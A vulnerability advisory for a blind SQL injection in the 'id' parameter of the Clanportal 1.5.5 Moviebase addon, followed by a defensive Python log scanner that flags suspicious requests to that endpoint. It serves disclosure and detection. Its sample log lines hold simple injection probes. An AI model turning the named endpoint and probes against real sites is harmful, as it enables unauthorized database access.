Vendor: deV!L`z Clanportal 1.5.5 Moviebase
By: Easy Laster
CVSS: 7,5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: deV!L`z Clanportal 1.5.5 Moviebase
Affected Version From: 1.5.5
Affected Version To: 1.5.5
Patch Exists: N/A
Related CWE: N/A
CPE: a:devilzclan:devilz_clanportal:1.5.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012
deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability
The deV!L`z Clanportal 1.5.5 Moviebase Addon is vulnerable to Blind SQL Injection. The vulnerability exists in the 'id' parameter of 'movies/index.php?action=showkat&id='. An attacker can inject malicious SQL queries into the vulnerable parameter and gain access to the database. Exploiting the vulnerability requires bypassing the SQL Injection Filter Function.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
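
Since no patch is listed, requests against the affected parameter can at least be monitored. The following is an added example, not part of the original advisory or the Clanportal code: it scans web server access logs for requests to 'movies/index.php?action=showkat' whose 'id' value is not a plain integer. It assumes the Apache/nginx "combined" log format and that 'id' is a numeric category id; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path, action and parameter names come from the advisory. The log layout is
# an assumption (Apache/nginx "combined" format).
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
VULN_PATH = "movies/index.php"

def suspicious_id(request_target):
    """Return the URL-decoded id if the request hits the showkat action with
    an id that is not a plain decimal integer (assumed format), else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(VULN_PATH):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "showkat" not in query.get("action", []):
        return None
    for value in query.get("id", []):
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (client_ip, status, decoded_id) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        value = suspicious_id(m.group(2))
        if value is not None:
            hits.append((m.group(1), int(m.group(3)), value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2012:10:00:01 +0000] "GET /movies/index.php?action=showkat&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2012:10:00:05 +0000] "GET /movies/index.php?action=showkat&id=3%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2012:10:00:06 +0000] "GET /movies/index.php?action=showkat&id=3%20AnD%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Mar/2012:10:00:09 +0000] "GET /movies/index.php?action=show&id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Mar/2012:10:00:12 +0000] "GET /forum/index.php?action=showkat&id=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

The same integer-only rule, enforced in the application or at a reverse proxy before the value reaches a query, is the input validation the mitigation calls for.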